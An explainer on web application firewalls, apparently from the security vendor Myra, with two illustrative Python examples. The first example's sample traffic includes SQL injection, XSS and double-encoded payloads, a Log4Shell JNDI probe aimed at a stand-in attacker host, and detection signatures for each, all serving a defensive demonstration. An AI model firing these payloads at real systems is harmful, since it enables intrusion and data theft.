

What is a Web Application Firewall (WAF)?

A Web Application Firewall (WAF) is a security solution that filters, monitors and blocks HTTP and HTTPS traffic to and from a web application. It protects against a wide range of attacks at the application layer, including SQL injection and cross-site scripting.

01

Web Application Firewall (WAF): A Definition

A Web Application Firewall (WAF) sits in front of websites, web applications and APIs and inspects the HTTP(S) traffic flowing between clients and the application. It blocks requests that match known attack patterns, such as cross-site scripting (XSS) and SQL injection, so that only traffic the rules consider legitimate reaches the application. WAFs are available as software, hardware appliances or managed cloud services, and their rule sets are updated as new attack techniques emerge. A WAF also helps organizations meet security standards and protect sensitive data from theft.


02

How Does a Web Application Firewall (WAF) Work?

A WAF protects web applications against attacks that target the application layer, such as cross-site scripting and SQL injection. It is placed inline between the Internet and the web application: every client request must pass through the WAF before it reaches the web server, and the WAF can inspect the server's responses on the way back.

When inspecting traffic, the WAF applies a set of rules, known as policies, that decide which requests are let through and which are filtered out. Policies are updated continuously so that the WAF can respond to new attack techniques. Two basic security models exist:

  • Blocklist WAFs follow a negative security model. They describe known attack patterns (signatures) and block requests that match one of them. Anything that matches no signature is allowed through, so a blocklist on its own cannot stop an attack it has no signature for.

  • Allowlist WAFs follow a positive security model. They describe what legitimate requests look like (permitted endpoints, methods, parameters and value formats) and block everything else. This also stops unknown attacks, but the policy must be kept in step with every change to the application, or it will block legitimate users.

In practice, many WAFs combine both models: a positive policy where the application's interface is well defined, and negative-model signatures as a safety net for everything else.

03

What Dangers Does a Web Application Firewall (WAF) Protect Against?

A web application firewall (WAF) helps shield web applications from data theft, account takeover and other abuse. With a WAF, organizations can defend against attack patterns such as the following:

Cross-Site Scripting (XSS)

In a cross-site scripting attack, attackers inject script code into a web application, typically through unsanitized input, so that the code executes in the browsers of other users who view the affected page. The injected script can steal session cookies or login credentials and perform actions on the victim's behalf. Interactive websites and applications that reflect or store user input are particularly susceptible. A WAF placed in front of the application can block requests that carry typical XSS payloads before they reach it.

SQL Injection

In a SQL injection attack, attackers insert SQL fragments into input fields or other request parameters that the application passes unsafely into database queries. Depending on the flaw, this lets them read, alter or delete data or bypass authentication. Dedicated rule sets allow WAF solutions to detect and block common injection patterns; the underlying fix remains parameterized queries in the application code.

OWASP Top 10

The non-profit OWASP Foundation regularly publishes the OWASP Top 10, a list of the most critical security risks for web applications. Several of the input-driven risks on this list, such as injection, can be mitigated by a web application firewall; others, such as broken access control or insecure design, have to be addressed in the application itself.

Zero-Day Exploits

Attackers are quick to exploit newly disclosed software vulnerabilities such as Log4Shell or the Confluence OGNL injection. WAF rules adapted to the exploit pattern, often called virtual patching, can block exploitation attempts as soon as the pattern is known. This buys time until patches for the vulnerable software are available and installed. It does not replace patching: pattern-based rules can often be evaded with variations of the payload, as the many Log4Shell obfuscations showed.
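The following is an added example, not code from Myra or from any WAF product, that shows the hybrid approach of sections 02 and 03 in miniature: a positive policy for one endpoint, a small blocklist of signatures for SQL injection and XSS plus, as a virtual patch, the `${jndi:` lookup syntax abused in Log4Shell, and a normalization step that URL-decodes input before signatures are matched. The `/login` policy, the rules, the `/search` endpoint and all sample requests are constructed for illustration; a production rule set is far larger.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, unquote, urlsplit


@dataclass
class Request:
    """Minimal HTTP request model, constructed for this example."""
    method: str
    target: str                          # path plus query string
    headers: dict = field(default_factory=dict)
    body: str = ""                       # raw form-encoded POST body


def normalize(value: str) -> str:
    """Undo up to three layers of URL encoding, then lower-case, so that
    '%3CScRiPt%3E' and '<script>' hit the same signature."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


# Negative security model: signatures of known attack patterns.
# Assumed rule set for this example; production rule sets are far larger.
BLOCKLIST = [
    ("sqli-tautology", re.compile(r"['\"]\s*or\s+[^\s=]+\s*=\s*[^\s=]+")),
    ("sqli-union",     re.compile(r"\bunion\b\s+(all\s+)?select\b")),
    ("xss-script-tag", re.compile(r"<\s*script\b")),
    ("xss-event",      re.compile(r"\bon(load|error|click|mouseover|focus)\s*=")),
    ("xss-js-uri",     re.compile(r"javascript\s*:")),
    # Virtual patch: the JNDI lookup syntax abused by Log4Shell, checked in
    # headers as well as parameters until the vulnerable library is patched.
    ("vpatch-jndi",    re.compile(r"\$\{\s*jndi\s*:")),
]

# Positive security model: what a legitimate request to /login looks like.
# Assumed policy for this example. Endpoints without a policy get the
# blocklist only, which is the hybrid approach described above.
ALLOWLIST = {
    "/login": {
        "methods": {"POST"},
        "params": {                      # name -> regex the whole value must match
            "username": re.compile(r"[A-Za-z0-9._@-]{1,64}"),
            "password": re.compile(r".{8,128}"),
        },
    },
}


def inspect(req: Request) -> tuple:
    """Return ("allow"|"block", reason): positive model first, then signatures."""
    url = urlsplit(req.target)
    params = parse_qsl(url.query, keep_blank_values=True)
    params += parse_qsl(req.body, keep_blank_values=True)

    policy = ALLOWLIST.get(url.path)
    if policy is not None:
        if req.method not in policy["methods"]:
            return "block", f"allowlist: {req.method} not permitted on {url.path}"
        for name, value in params:
            pattern = policy["params"].get(name)
            if pattern is None:
                return "block", f"allowlist: unexpected parameter {name!r}"
            if not pattern.fullmatch(value):
                return "block", f"allowlist: {name!r} fails format check"

    # Signatures run over every parameter value and header, with or without
    # a positive policy for the endpoint.
    for name, value in params + list(req.headers.items()):
        norm = normalize(value)
        for rule_id, pattern in BLOCKLIST:
            if pattern.search(norm):
                return "block", f"blocklist: {rule_id} matched in {name!r}"
    return "allow", "no rule matched"


# Constructed sample traffic; host names and payloads are illustrative.
SAMPLE_REQUESTS = {
    "benign login":       Request("POST", "/login", body="username=alice&password=S3cure-Pass%21"),
    "benign search":      Request("GET", "/search?q=running+shoes+size+42"),
    "extra login param":  Request("POST", "/login", body="username=alice&password=S3cure-Pass%21&debug=1"),
    "sqli in username":   Request("POST", "/login", body="username=admin%27+OR+1%3D1--&password=whatever1"),
    "sqli in search":     Request("GET", "/search?q=x%27+UNION+SELECT+password+FROM+users--"),
    "xss in search":      Request("GET", "/search?q=%3Cscript%3Ealert(1)%3C/script%3E"),
    "double-encoded xss": Request("GET", "/search?q=%253CScRiPt%253Ealert(1)"),
    "log4shell probe":    Request("GET", "/", headers={"User-Agent": "${jndi:ldap://attacker.example/a}"}),
}

if __name__ == "__main__":
    for name, req in SAMPLE_REQUESTS.items():
        action, reason = inspect(req)
        print(f"{action:5}  {name:20}  {reason}")
```

Two details are worth noting. The injected username on `/login` never reaches the signature stage because the positive policy rejects it on format alone, which is why a positive model catches attacks it has no signature for. The double-encoded payload would slip past the same `<script` signature if matching ran on the raw value; the decode-then-match step is what real WAFs spend much of their effort on, and it is also where evasion attempts concentrate.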

04

What Are the Advantages of Using WAF Security?

Companies that use a web application firewall on their website benefit from the following advantages:


Additional Security Layer for Web Applications

An application-level firewall adds a further layer of protection against unauthorized access to web applications. It works best as one layer among other security measures, not as a replacement for them.


Closing Security Gaps in Multiple Applications

A single WAF can be placed in front of several applications at once. Known vulnerabilities in those applications can then be mitigated centrally, without changing each application individually.


Protection of Legacy Systems and Applications

Legacy software that no longer receives updates, or internally developed applications whose code cannot easily be changed, may carry vulnerabilities that cannot be fixed quickly. A WAF provides an additional protective layer in front of such systems.

05

What Types of WAFs Are There?

You can set up a WAF architecture in three ways:

  • Centralized, using a network-based hardware or virtual appliance

  • Host-based, installed directly on the web server

  • As a cloud SaaS solution from a provider

Depending on the type and deployment, functionality and cost differ considerably.

Network-Based WAF

These web application firewalls are hardware or virtual appliances deployed inline in front of the web servers. They offer high throughput and low latency, but require their own hardware or virtualization capacity and must be sized, operated and kept up to date in-house.

Host-Based WAF

Host-based WAFs are software packages or web server modules that run on the same host as the web application. They integrate closely with the application and offer fine-grained control, but consume the application server's resources and must be installed and maintained on every host.

Cloud SaaS WAF

Many providers now offer web application firewalls as software as a service (SaaS). These cloud-hosted options reduce the internal effort for companies and are flexible and cost-effective. With a managed WAF, the provider handles configuration, maintenance and operation of the firewall.


06

What Can an Application-Level Firewall Not Protect Against?

A WAF does not offer complete protection and should therefore always be one component of a comprehensive security concept. An application-level firewall cannot defend against the following threats:

  • Attacks over protocols other than HTTP/S, such as DNS, SMTP, Telnet, RDP, SSH or FTP, are invisible to a WAF, which only inspects web traffic. They are the domain of network firewalls and protocol-specific controls.

  • DDoS attacks that flood web applications and the underlying infrastructure with traffic can only be partially mitigated by a WAF, which sees individual requests but cannot absorb volumetric floods against the network or the protocol stack. Dedicated DDoS protection at network, protocol and application level offers reliable protection here.

  • Logic flaws in the web application itself, for example a missing authorization check or a broken assumption about the order of steps in a workflow, can be exploited with requests that are syntactically perfectly legitimate. Such conceptual programming errors are not recognized by an application-level firewall.
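As an added illustration of the last point (example code, not from the original page): the request below, in which one customer reads another customer's order, contains nothing a signature could match, so it passes a WAF stub unchanged, and only an ownership check inside the application stops it. The order store, the session model and the URL scheme `/api/orders/<id>` are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed order store: two customers, one order each.
ORDERS = {
    1001: {"owner": "alice", "items": ["running shoes"], "total": 89.90},
    1002: {"owner": "bob", "items": ["backpack"], "total": 59.00},
}

# A few signatures standing in for the WAF's blocklist. They are here only to
# show that the exploit request below matches none of them.
SIGNATURES = [re.compile(p) for p in (r"['\"]\s*or\s+\S+=", r"<\s*script\b", r"\bunion\s+select\b")]


def waf_blocks(target: str) -> bool:
    """True if any signature matches the lower-cased request target."""
    return any(s.search(target.lower()) for s in SIGNATURES)


@dataclass
class Session:
    user: str                    # the authenticated user (assumed session model)


def get_order_vulnerable(session: Session, order_id: int) -> dict:
    """Looks the order up by ID only: any logged-in user can read any order."""
    return ORDERS[order_id]


def get_order_fixed(session: Session, order_id: int) -> dict:
    """Same lookup, but the caller must own the order. Unknown and foreign
    orders both raise, so the response does not reveal whether an ID exists."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != session.user:
        raise PermissionError(f"{session.user} may not read order {order_id}")
    return order


def handle(session: Session, target: str, handler) -> tuple:
    """Tiny pipeline: WAF first, then the application. Returns (status, body)."""
    if waf_blocks(target):
        return 403, "blocked by WAF"
    match = re.fullmatch(r"/api/orders/(\d+)", target)
    if not match:
        return 404, "not found"
    try:
        return 200, handler(session, int(match.group(1)))
    except PermissionError:
        return 403, "forbidden"
    except KeyError:
        return 404, "not found"


if __name__ == "__main__":
    alice = Session("alice")
    # alice requests bob's order. The request is syntactically ordinary, so
    # the WAF lets it through; only the application can know who owns 1002.
    print(handle(alice, "/api/orders/1002", get_order_vulnerable))  # 200 with bob's order
    print(handle(alice, "/api/orders/1002", get_order_fixed))       # 403 forbidden
    print(handle(alice, "/api/orders/1001", get_order_fixed))       # 200 with alice's own order
```

The same WAF stub does block an obviously hostile target such as `/search?q=<script>`, which is exactly the contrast the section describes: the firewall judges the shape of a request, while the authorization decision depends on who is asking for what, a fact only the application holds.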

07

Which Companies Need a WAF?

Companies that run important websites, online portals or web APIs benefit from a cloud WAF. For merchants that accept credit card payments, a WAF is a common way to meet the PCI DSS requirements for protecting public-facing web applications, which makes it especially relevant for e-commerce businesses. Other regulations, such as the NIS-2 directive, also oblige companies to secure their systems with state-of-the-art technology, which for critical online applications often includes a WAF. Organizations with fast, agile release cycles additionally use a WAF as a safety net against vulnerabilities that slip through between releases.

08

What Do Companies Need to Consider When Using a WAF?

A web application firewall is only as good as its filters and configuration. Misconfigured or overly restrictive rules produce false positives that block legitimate users, while rules that are too lax let attacks through. Operating a WAF therefore requires IT security specialists with the time and resources for ongoing tuning: reviewing logs, handling false positives and updating rules as the application changes. Companies that cannot provide this internally turn to managed SaaS offerings, where the provider takes over these administrative tasks.


09

Web Application Firewall (WAF): What You Need to Know

A web application firewall is an important component of a comprehensive security concept for the company website, business-critical online portals and APIs. It monitors traffic directly at the application level, checking incoming requests and the web server's responses for suspicious patterns. Requests classified as malicious are blocked by the WAF, so applications gain protection without any changes to the application code itself.

The Web Application Firewall protects websites from attacks that occur via the Hypertext Transfer Protocol (HTTP/S). These include risks from the OWASP Top 10, zero-day exploits, SQL injection and cross-site scripting (XSS).

To ensure smooth operation, the WAF must be tuned to the web applications it protects. Only then can false positives, performance problems and outages be ruled out in advance.

The Myra WAF protects your content and applications and integrates seamlessly into your existing IT infrastructure.

Learn more about the Myra WAF


About the author

Björn Greif

Senior Editor


Björn started his career as an editor at the IT news portal ZDNet in 2006. 10 years and exactly 12,693 articles later, he joined the German start-up Cliqz to campaign for more privacy and data protection on the web. It was then only a small step from data protection to IT security: Björn has been writing about the latest trends and developments in the world of cybersecurity at Myra since 2020.